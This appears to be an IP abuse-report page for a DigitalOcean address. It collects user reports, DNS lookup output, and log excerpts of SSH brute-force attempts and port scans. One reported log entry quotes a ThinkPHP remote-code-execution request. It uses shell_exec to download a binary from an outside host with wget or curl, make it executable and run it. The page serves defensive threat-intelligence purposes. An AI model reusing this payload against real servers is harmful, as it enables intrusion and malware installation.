Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: Bengaluru

Region: Karnataka

Country: India

Internet Service Provider: unknown

Hostname: unknown

Organization: DigitalOcean, LLC

Usage Type: unknown

Comments:
Type Details Datetime
attack
142.93.214.167 - - [16/Apr/2019:06:00:02 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 301 194 "-" "python-requests/2.12.4"
142.93.214.167 - - [16/Apr/2019:06:00:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 404 209 "-" "python-requests/2.12.4"
142.93.214.167 - - [16/Apr/2019:06:00:06 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 301 194 "-" "python-requests/2.12.4"
142.93.214.167 - - [16/Apr/2019:06:00:08 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 404 209 "-" "python-requests/2.12.4"
2019-04-16 06:28:55
Comments on same subnet:
IP Type Details Datetime
142.93.214.20 attackbotsspam
Unauthorized connection attempt detected from IP address 142.93.214.20 to port 2220 [J]
2020-02-03 05:47:36
142.93.214.20 attack
Unauthorized connection attempt detected from IP address 142.93.214.20 to port 2220 [J]
2020-02-02 14:14:06
142.93.214.20 attackspambots
SSH Brute-Force attacks
2020-01-11 23:01:06
142.93.214.20 attackspambots
2019-12-24T19:42:47.691176shield sshd\[17651\]: Invalid user manjul from 142.93.214.20 port 41604
2019-12-24T19:42:47.695731shield sshd\[17651\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20
2019-12-24T19:42:49.483794shield sshd\[17651\]: Failed password for invalid user manjul from 142.93.214.20 port 41604 ssh2
2019-12-24T19:45:30.306333shield sshd\[18230\]: Invalid user 123456 from 142.93.214.20 port 36402
2019-12-24T19:45:30.311080shield sshd\[18230\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20
2019-12-25 06:50:31
142.93.214.20 attackspambots
Brute-force attempt banned
2019-12-21 17:28:08
142.93.214.20 attackspam
SSH brute-force: detected 10 distinct usernames within a 24-hour window.
2019-12-21 05:15:01
142.93.214.20 attack
Dec 19 17:35:42 sd-53420 sshd\[18450\]: User root from 142.93.214.20 not allowed because none of user's groups are listed in AllowGroups
Dec 19 17:35:42 sd-53420 sshd\[18450\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20  user=root
Dec 19 17:35:44 sd-53420 sshd\[18450\]: Failed password for invalid user root from 142.93.214.20 port 36492 ssh2
Dec 19 17:41:48 sd-53420 sshd\[20750\]: User root from 142.93.214.20 not allowed because none of user's groups are listed in AllowGroups
Dec 19 17:41:48 sd-53420 sshd\[20750\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20  user=root
...
2019-12-20 03:54:45
142.93.214.20 attackspam
SSH Bruteforce attempt
2019-12-16 14:10:34
142.93.214.20 attackspam
Dec 10 22:36:35 server sshd\[31964\]: Invalid user guest from 142.93.214.20
Dec 10 22:36:35 server sshd\[31964\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 
Dec 10 22:36:37 server sshd\[31964\]: Failed password for invalid user guest from 142.93.214.20 port 57346 ssh2
Dec 10 22:43:41 server sshd\[1288\]: Invalid user tanja from 142.93.214.20
Dec 10 22:43:41 server sshd\[1288\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 
...
2019-12-11 07:16:23
142.93.214.20 attackbotsspam
Dec  6 10:07:04 root sshd[13156]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 
Dec  6 10:07:06 root sshd[13156]: Failed password for invalid user test from 142.93.214.20 port 43690 ssh2
Dec  6 10:13:25 root sshd[13340]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 
...
2019-12-06 17:17:54
142.93.214.20 attack
Invalid user hilliary from 142.93.214.20 port 41734
2019-11-26 16:49:53
142.93.214.20 attackspambots
Brute-force attempt banned
2019-11-19 03:35:00
142.93.214.20 attackspam
Invalid user guest from 142.93.214.20 port 45864
2019-11-11 22:14:33
142.93.214.20 attackspam
Nov 10 09:35:09 web9 sshd\[14364\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20  user=root
Nov 10 09:35:12 web9 sshd\[14364\]: Failed password for root from 142.93.214.20 port 52310 ssh2
Nov 10 09:41:58 web9 sshd\[15476\]: Invalid user  from 142.93.214.20
Nov 10 09:41:58 web9 sshd\[15476\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20
Nov 10 09:42:00 web9 sshd\[15476\]: Failed password for invalid user  from 142.93.214.20 port 33376 ssh2
2019-11-11 03:52:19
142.93.214.20 attackspambots
Nov  8 07:22:30 minden010 sshd[10581]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20
Nov  8 07:22:32 minden010 sshd[10581]: Failed password for invalid user All from 142.93.214.20 port 45216 ssh2
Nov  8 07:26:46 minden010 sshd[11427]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20
...
2019-11-08 17:57:21
Whois info:
b
Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 142.93.214.167
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36859
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;142.93.214.167.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019041501 1800 900 604800 86400

;; Query time: 3 msec
;; SERVER: 67.207.67.3#53(67.207.67.3)
;; WHEN: Tue Apr 16 06:28:54 +08 2019
;; MSG SIZE  rcvd: 118

Host info
Host 167.214.93.142.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		67.207.67.3
Address:	67.207.67.3#53

** server can't find 167.214.93.142.in-addr.arpa: NXDOMAIN

Related IP info:
Related comments:
IP Type Details Datetime
157.230.219.73 attack
Mar 19 12:38:13 *host* sshd\[28515\]: Invalid user postgres from 157.230.219.73 port 36634
2020-03-19 20:02:51
134.19.251.26 attackbots
Unauthorized connection attempt detected from IP address 134.19.251.26 to port 23
2020-03-19 20:23:21
116.196.101.168 attackbotsspam
Mar 19 10:55:00 tuxlinux sshd[27997]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.196.101.168  user=root
Mar 19 10:55:03 tuxlinux sshd[27997]: Failed password for root from 116.196.101.168 port 57112 ssh2
Mar 19 10:55:00 tuxlinux sshd[27997]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.196.101.168  user=root
Mar 19 10:55:03 tuxlinux sshd[27997]: Failed password for root from 116.196.101.168 port 57112 ssh2
Mar 19 11:34:19 tuxlinux sshd[28728]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.196.101.168  user=root
...
2020-03-19 20:23:51
167.99.75.174 attack
Mar 19 12:34:22 work-partkepr sshd\[25726\]: Invalid user ubuntu from 167.99.75.174 port 43744
Mar 19 12:34:22 work-partkepr sshd\[25726\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.99.75.174
...
2020-03-19 20:35:51
164.132.241.243 attackbotsspam
Tried sshing with brute force.
2020-03-19 19:58:38
128.199.91.233 attack
SSH Login Bruteforce
2020-03-19 20:44:47
157.245.235.244 attackspam
Mar 19 07:53:57 firewall sshd[21012]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.245.235.244
Mar 19 07:53:57 firewall sshd[21012]: Invalid user admin from 157.245.235.244
Mar 19 07:53:59 firewall sshd[21012]: Failed password for invalid user admin from 157.245.235.244 port 60714 ssh2
...
2020-03-19 20:09:15
122.138.222.200 attackbots
Telnet/23 MH Probe, Scan, BF, Hack -
2020-03-19 20:26:20
185.175.93.100 attackbots
firewall-block, port(s): 5920/tcp, 5921/tcp, 5922/tcp, 5925/tcp, 5926/tcp, 5929/tcp, 5931/tcp, 5935/tcp, 5936/tcp, 5938/tcp, 5939/tcp, 5944/tcp
2020-03-19 20:45:35
132.232.64.72 attackbots
SSH-BruteForce
2020-03-19 20:18:06
138.128.209.35 attackspambots
Mar 19 07:22:35 nextcloud sshd\[13488\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.128.209.35  user=root
Mar 19 07:22:37 nextcloud sshd\[13488\]: Failed password for root from 138.128.209.35 port 34068 ssh2
Mar 19 07:32:51 nextcloud sshd\[18502\]: Invalid user support from 138.128.209.35
Mar 19 07:32:51 nextcloud sshd\[18502\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.128.209.35
2020-03-19 20:39:29
116.111.100.222 attackbotsspam
20/3/18@23:52:58: FAIL: Alarm-Network address from=116.111.100.222
20/3/18@23:52:58: FAIL: Alarm-Network address from=116.111.100.222
...
2020-03-19 20:09:49
206.174.214.90 attack
leo_www
2020-03-19 19:59:10
107.13.186.21 attackbotsspam
(sshd) Failed SSH login from 107.13.186.21 (US/United States/mta-107-13-186-21.nc.rr.com): 2 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Mar 19 13:03:45 ubnt-55d23 sshd[30544]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=107.13.186.21  user=root
Mar 19 13:03:47 ubnt-55d23 sshd[30544]: Failed password for root from 107.13.186.21 port 40296 ssh2
2020-03-19 20:18:38
193.57.42.6 attackbots
SSH login attempts.
2020-03-19 20:37:08

Recently Reported IPs

209.17.96.202 178.72.70.33 89.176.98.57 134.209.20.161
220.243.136.52 87.168.245.228 190.234.125.28 173.212.254.113
172.245.90.230 149.56.10.119 104.211.217.225 103.219.162.19
103.65.195.107 80.211.232.89 14.115.135.150 196.52.43.56
178.141.29.68 167.99.2.67 78.137.198.237 124.230.172.172